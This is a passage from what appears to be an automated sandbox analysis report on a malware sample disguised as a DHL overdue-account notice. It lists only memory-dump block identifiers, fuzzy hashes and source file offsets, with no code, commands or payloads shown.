                                                  • Opcode ID: 874dfd0066dbdf0dd7e69dfd1c270fc705380203102a0e440f909cbc5facdf51
                                                  • Instruction ID: 62118c7ddba58018daf6bbc85cbaa97f8c69516c57bf9e376763723117d745c2
                                                  • Opcode Fuzzy Hash: 874dfd0066dbdf0dd7e69dfd1c270fc705380203102a0e440f909cbc5facdf51
                                                  • Instruction Fuzzy Hash: 0F4194B1A0031A8FEB14EFA9C54469FBBF6FFC8250F148529E509E7340DB34A901CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06cb086fe4fbbe7d9b74b712b7d5b26583a1a8037b763e3d4ae750f2a61d4172
                                                  • Instruction ID: 25220d332d3830b3a27d24d0b0e53146af70a9087a69556b2549892abcc7b02f
                                                  • Opcode Fuzzy Hash: 06cb086fe4fbbe7d9b74b712b7d5b26583a1a8037b763e3d4ae750f2a61d4172
                                                  • Instruction Fuzzy Hash: E74174B1300615DFD764AB28C494B6EB3F2BF85315F104629D209CB690DBB5AC47DB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94033d5a64ffe8f32f57c66072666ea5dfb0c898001dc4ab8cba925c3251966b
                                                  • Instruction ID: 4a2e65e4d0e1e80bcb0c780b43d1328eae2582fe8377802e7f2e869da7ca7676
                                                  • Opcode Fuzzy Hash: 94033d5a64ffe8f32f57c66072666ea5dfb0c898001dc4ab8cba925c3251966b
                                                  • Instruction Fuzzy Hash: 3341B6B1300616CFC725AF28C494B6DB3F2BF85304F14466AD245CB2A1DBB5A847DB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4106e7a95e07f7c9e1a63a761b7fd09e8d671bf5a8ca36661c86ca740759da7e
                                                  • Instruction ID: 2972cf20abc2dfd8bd5607bfd459abe52cdbc69a607ffe2c909485ee750e0d14
                                                  • Opcode Fuzzy Hash: 4106e7a95e07f7c9e1a63a761b7fd09e8d671bf5a8ca36661c86ca740759da7e
                                                  • Instruction Fuzzy Hash: 09414C75E001598BDB44DBA9D898AEEBBF2BF88310F24C169D511BB390CB709C46DF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c042d57f10cad6886899b1218935f9ea05efd49c0a8f1ff1326c5e93eeecf24
                                                  • Instruction ID: 5bfd69f9a3d741bb9055328c8631e4043caf3b41884e2faa4db59f65b05a4ebf
                                                  • Opcode Fuzzy Hash: 7c042d57f10cad6886899b1218935f9ea05efd49c0a8f1ff1326c5e93eeecf24
                                                  • Instruction Fuzzy Hash: 2E31EF76E0525A8FCB45DBB9D8141EEBBF2EF89310F24816AD504F7250EB345D0A8B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42c072b743322ad1eccd376f77dc2bf4cc1e28f2966aa3b957155de101bf492f
                                                  • Instruction ID: a2cadac055d27fb17d6f29b66761c9357b6bce300a67a075fc051ab98ed37c73
                                                  • Opcode Fuzzy Hash: 42c072b743322ad1eccd376f77dc2bf4cc1e28f2966aa3b957155de101bf492f
                                                  • Instruction Fuzzy Hash: 6E314DB69002099FDB14DFA9D884ADEBFF5FB49310F14842AE909E7210D774A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7052103dbe14e11146c9bbfe2f92072a49196395f8c6a569a0bc9ec60b676aec
                                                  • Instruction ID: 73756d98378a5dc11b35d13f4b7336963a3c2f7f2095ba432c81b620ee2584a4
                                                  • Opcode Fuzzy Hash: 7052103dbe14e11146c9bbfe2f92072a49196395f8c6a569a0bc9ec60b676aec
                                                  • Instruction Fuzzy Hash: E241A2712007018FC7599F34C848B597BE2BF85314F2586AAE15ACB3B2CF78A84BDB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fea4e2061a0b6b77cba4a5461053a9ebe5a1e5a12495c8f3bdaebffbae7652e
                                                  • Instruction ID: e4d7c946d52c6e3f6dc5411ed03f4e2935056a2d2b113098685c612b8eb6df56
                                                  • Opcode Fuzzy Hash: 7fea4e2061a0b6b77cba4a5461053a9ebe5a1e5a12495c8f3bdaebffbae7652e
                                                  • Instruction Fuzzy Hash: 5341B3B4E04228DFEB64DF64C944BADBBB2BB49300F1081D9E949A7345CB355E82DF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45bb8d48ac42383d7658f6afd39e9be96179b2e7f9f591871a7153a1a5765498
                                                  • Instruction ID: f86f640d68d52ef9a0c1f76432bd89715f6ed4ef5da28fd024877e4e8745337e
                                                  • Opcode Fuzzy Hash: 45bb8d48ac42383d7658f6afd39e9be96179b2e7f9f591871a7153a1a5765498
                                                  • Instruction Fuzzy Hash: 4F317C767002259FCB05DF68D884AAE7BB6BF88320F114299F525CB2B1CB70DD02CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02c9235866c309d58c9c91e413a3fbf1dc91a8b4e3d667e62986ae612001bab1
                                                  • Instruction ID: a1802180dc03dfd2df30e8216c3cd67f17e2e8704cd5d13f63af934e365e2e5b
                                                  • Opcode Fuzzy Hash: 02c9235866c309d58c9c91e413a3fbf1dc91a8b4e3d667e62986ae612001bab1
                                                  • Instruction Fuzzy Hash: A03107713006128FD758DB69C884F6973E6BF99610F1681A9E61ACB361DE34E842DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e62197cf5c59da510357859e6585ff1b0f5b3f31879b4b1e6a4b1a80fe2f87bb
                                                  • Instruction ID: 273944a7b2ce9ec693ca682c9904758a35104b5185fe45591acca0b9e3ffc339
                                                  • Opcode Fuzzy Hash: e62197cf5c59da510357859e6585ff1b0f5b3f31879b4b1e6a4b1a80fe2f87bb
                                                  • Instruction Fuzzy Hash: 67312571300212CFD758DB68C884FA977E5BF99610F1681A9EA59CB361EF34EC42DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1e28266271cf4565006547a5c8d300da5295c0fd3aa5f01775627dacaf054df
                                                  • Instruction ID: eb43472b9aa3f6a9c865a5ac354a6454a90ac3f49d97bef5067431a5465f47eb
                                                  • Opcode Fuzzy Hash: c1e28266271cf4565006547a5c8d300da5295c0fd3aa5f01775627dacaf054df
                                                  • Instruction Fuzzy Hash: 93311A757002159FCB15DF68D884AAE7BB6FF88720F114259F5258B2B1CB71DD02DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6d8634aef21027ab2dd9e0be9e4bf2c04dcebb0924536a79e01345f1406b703
                                                  • Instruction ID: 0c52c43d7826a7ea87fdac1ea1d6ad01d034040ca4cb6eeeb2c375ad61790ab7
                                                  • Opcode Fuzzy Hash: c6d8634aef21027ab2dd9e0be9e4bf2c04dcebb0924536a79e01345f1406b703
                                                  • Instruction Fuzzy Hash: C5316BF5918209CFCB04DFA8D841AFEBBF5EB4A300F10966AC414A3250EB351A42DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7af0c87558ff02cffb081d7bfa7289b5fa372f2c4bc2834b7400fc5ec9d6f8f
                                                  • Instruction ID: 5c1529ff174c89fa31f3cc5bd7b9571dcf1ef10bb0b1475d08a42246afec2146
                                                  • Opcode Fuzzy Hash: d7af0c87558ff02cffb081d7bfa7289b5fa372f2c4bc2834b7400fc5ec9d6f8f
                                                  • Instruction Fuzzy Hash: 55316CB1D04259DFEB04CFA8D440AEFBBF5EB89310F01C26AC425A7251CB359942DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b993c26083348a91f0ddc8960154b13761410820d34bdf1cacc0717e14267515
                                                  • Instruction ID: ae1edabfa1dc216fe668ff002986af1b0b70ec7d9daf9090611eb37537c12cce
                                                  • Opcode Fuzzy Hash: b993c26083348a91f0ddc8960154b13761410820d34bdf1cacc0717e14267515
                                                  • Instruction Fuzzy Hash: 88316AB5E04219DFEB04DFA8D440AAFBBF6EB89310F01C269C425A7340CB359942DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e51ed967666c1debb1e65d2b81251910566e727dde5ee3b9d70ee2091446382c
                                                  • Instruction ID: 35b464fa9f90c5e231224ebc0b8fca974d8d85f5659a9649b86f2c41f3d45972
                                                  • Opcode Fuzzy Hash: e51ed967666c1debb1e65d2b81251910566e727dde5ee3b9d70ee2091446382c
                                                  • Instruction Fuzzy Hash: C7314D712006118FD7A49F28C848B56B7E5BF84324F608669E55A8B2B1DF79E88B9B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 659594624c191fbd9cdbf1a8e5def818c0582f040aa6d2b45256dd194a8e76d0
                                                  • Instruction ID: 246db76d0f11272e3cb0e55ea44bfa0467e4955fbfbe409d22567ef5a01d98f7
                                                  • Opcode Fuzzy Hash: 659594624c191fbd9cdbf1a8e5def818c0582f040aa6d2b45256dd194a8e76d0
                                                  • Instruction Fuzzy Hash: 4321C5F27001229B4E556BBCA45423E3AD7BBC555570A1229EA02CB394EF68CC03B7D7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf9cc35943de5147b8dfb72258a4976603c970a2cf8d4be79f3840d25c015263
                                                  • Instruction ID: 7fedd5194de3e71d0349001e07962c3afd6545ec986ae13114baa00d9c9f6b6c
                                                  • Opcode Fuzzy Hash: bf9cc35943de5147b8dfb72258a4976603c970a2cf8d4be79f3840d25c015263
                                                  • Instruction Fuzzy Hash: 2E21D572204355CFC721EF30C8504AA77F5BF422147A047BEE46696190EB35D8A7EB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56ef147e9491e0619543454fdc87b3ad23104a0d4fad792c9fcbdfee79307777
                                                  • Instruction ID: 9a3ea3e4b84720637e219c011d1264687039580ee376fe0e1b1fe14bfa72c2ae
                                                  • Opcode Fuzzy Hash: 56ef147e9491e0619543454fdc87b3ad23104a0d4fad792c9fcbdfee79307777
                                                  • Instruction Fuzzy Hash: FF316AB5600215CFDB65DFA8D444A9D7BF2FF88321F165168E901AB2A1CB30EC82CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2558eaa6c579b8680e6645fdb7eecb351ec8684b967ec2a9d400730e02b8efb
                                                  • Instruction ID: 4ae0eb7866264b00f220bec343a1d830a0e413106c7dd19010f7348059d07578
                                                  • Opcode Fuzzy Hash: e2558eaa6c579b8680e6645fdb7eecb351ec8684b967ec2a9d400730e02b8efb
                                                  • Instruction Fuzzy Hash: 3B315C31200611CFC7559B38C848BA67BE1FF85314F1685AAE08ACB262DE75AC8ACB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65981e94bf50680245f717cde4e03e451d90b1b4a3326bee4b22db86b910e4cd
                                                  • Instruction ID: 0f8d1d54c6780d528caddd6c4cb3eb19e7856244e65146b2b90201b4411a8341
                                                  • Opcode Fuzzy Hash: 65981e94bf50680245f717cde4e03e451d90b1b4a3326bee4b22db86b910e4cd
                                                  • Instruction Fuzzy Hash: 353129F4E0420ADFDB08DFA8D9416BEB7F6FB49300F108129D509A7744C7386A41CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352500459.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_fcd000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e62cfa9ce1a06da17e4444627f37068bcb56568568be6b0df623164522c5b5c
                                                  • Instruction ID: d98f873edbb7b6c2354b0edf42b346da412724fea075e0bf5f951daf38e72a89
                                                  • Opcode Fuzzy Hash: 7e62cfa9ce1a06da17e4444627f37068bcb56568568be6b0df623164522c5b5c
                                                  • Instruction Fuzzy Hash: 962128B6504245EFDB08DF14DAC1F2ABF65FB94324F20C17DDA090B256C336E856DAA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352500459.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_fcd000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50a2451dceb57032807662bc921f008c1581756546581f884221bd24bab6e3ee
                                                  • Instruction ID: 895de76f19a8ec2ac54bcf515337c038f7d11e89cc73881c605143245b30372c
                                                  • Opcode Fuzzy Hash: 50a2451dceb57032807662bc921f008c1581756546581f884221bd24bab6e3ee
                                                  • Instruction Fuzzy Hash: 16214872900241DFCB04DF14DAC1F2ABF65FB84328F24C97DD9090B256C336D816DAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee4a61f1673326cf00da523363d0fc285612172ea6a0224307dedeb3e3e6f154
                                                  • Instruction ID: b8f142787710856c86eeb22a30091eb64850bdf0d17de18e6b34aea8cbd5d35b
                                                  • Opcode Fuzzy Hash: ee4a61f1673326cf00da523363d0fc285612172ea6a0224307dedeb3e3e6f154
                                                  • Instruction Fuzzy Hash: DA21AE70A493868FC705DF78D96058D7FB2AF82214B2481EAD048DF2E3DB358D0ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7aaa3681676905dbd5509a51608a966eae7e1736b983efdd79fc9a3c8b957dd3
                                                  • Instruction ID: 31da18bb4f4bca660d6aa8276e915636b73e0f347061026936a21b13daec64c5
                                                  • Opcode Fuzzy Hash: 7aaa3681676905dbd5509a51608a966eae7e1736b983efdd79fc9a3c8b957dd3
                                                  • Instruction Fuzzy Hash: B4110AF23001229B8F556BB8955417E37D7BFC555570A021AE502CB395DF28CC03E793
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352559834.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_fdd000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8612876a72c836eba7d8db9fad185ac33d0397c477029de6d8cfad2dd55650fd
                                                  • Instruction ID: a747756751b646ffb810a197ffbdbec1925d832cd5937efe76fc7ee966285c56
                                                  • Opcode Fuzzy Hash: 8612876a72c836eba7d8db9fad185ac33d0397c477029de6d8cfad2dd55650fd
                                                  • Instruction Fuzzy Hash: B9212576504200DFCB14DF14D9C8B26BB66FBC4324F28C56ED90A0B35AC376D807DA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352559834.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_fdd000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6435a074a8a3b5447c6eb20948403119d5985e25e859f57d1d81167f016d828f
                                                  • Instruction ID: fa6698c5be1fcc4891d5642eb30617a01b5491cc3c922cf5809f47ba82dc2909
                                                  • Opcode Fuzzy Hash: 6435a074a8a3b5447c6eb20948403119d5985e25e859f57d1d81167f016d828f
                                                  • Instruction Fuzzy Hash: 71212676904304EFDB05DF14D9C0F26BBA6FB84324F28C56EE9094B392C776D846DA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 960bdfcc306e9dae6f2cca0b65b2b26080a02e68b1280860a5b2e1b7eb67ceb5
                                                  • Instruction ID: 6dead320dabab6c8d3c90a3eff2da6351a0fa8832e92156936c3334b1d2c9f88
                                                  • Opcode Fuzzy Hash: 960bdfcc306e9dae6f2cca0b65b2b26080a02e68b1280860a5b2e1b7eb67ceb5
                                                  • Instruction Fuzzy Hash: A7314B31210601CFC794DB68C848BAA77E6FF85311F5586A9E15ECB361DF75AC8ACB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: efc44e2f93eb41c8deeb2761209eef871b649170b107926c81377ec40e840774
                                                  • Instruction ID: 9e6b962354ec2afea42418e6d0ca545c8e7594ba9ea2a5ec71ff4388c3c00df7
                                                  • Opcode Fuzzy Hash: efc44e2f93eb41c8deeb2761209eef871b649170b107926c81377ec40e840774
                                                  • Instruction Fuzzy Hash: 6B110B727193849FE70ADB70CC5256D7BF4EF4210072804EAD885C3352EA34EE15C721
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 140b6a5db38ab11456bc8aeec024655798d73eface5cfe1a7adefe1a5d6bfb19
                                                  • Instruction ID: 6a87da5502a8b8c42b81d5d3f3422d1be0331e45f9736f2ee50a269ca4c14b44
                                                  • Opcode Fuzzy Hash: 140b6a5db38ab11456bc8aeec024655798d73eface5cfe1a7adefe1a5d6bfb19
                                                  • Instruction Fuzzy Hash: C52149F6D142598BEB08CFEAD8543EDBBF6AF89300F14812AC418AB354DB745946DB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d9301a23c478f388cd41c229bad75ad6a016af16509087d7e866f5ae2d123e6
                                                  • Instruction ID: aa091a50327fd2968f8baa91a4a319753ea670f551c7dfe3784f4c9a40b28623
                                                  • Opcode Fuzzy Hash: 5d9301a23c478f388cd41c229bad75ad6a016af16509087d7e866f5ae2d123e6
                                                  • Instruction Fuzzy Hash: DF213DB5E0821ACFCB41CFA4C1909AEBBF5EB4D340F509195D815A7311D330AE41DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32076d3c7e275c75a16895cd0b655de676cd9755297251878a9b56f8555bb25a
                                                  • Instruction ID: 07bd86244bd465661fcd09d2e67b2d30c45c5409b797ac94a5003c6a7984fb36
                                                  • Opcode Fuzzy Hash: 32076d3c7e275c75a16895cd0b655de676cd9755297251878a9b56f8555bb25a
                                                  • Instruction Fuzzy Hash: 9C21DFB0C01258DFEB24CF99C588B8EBFF5BB48714F24802AE418BB240C7B56845CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
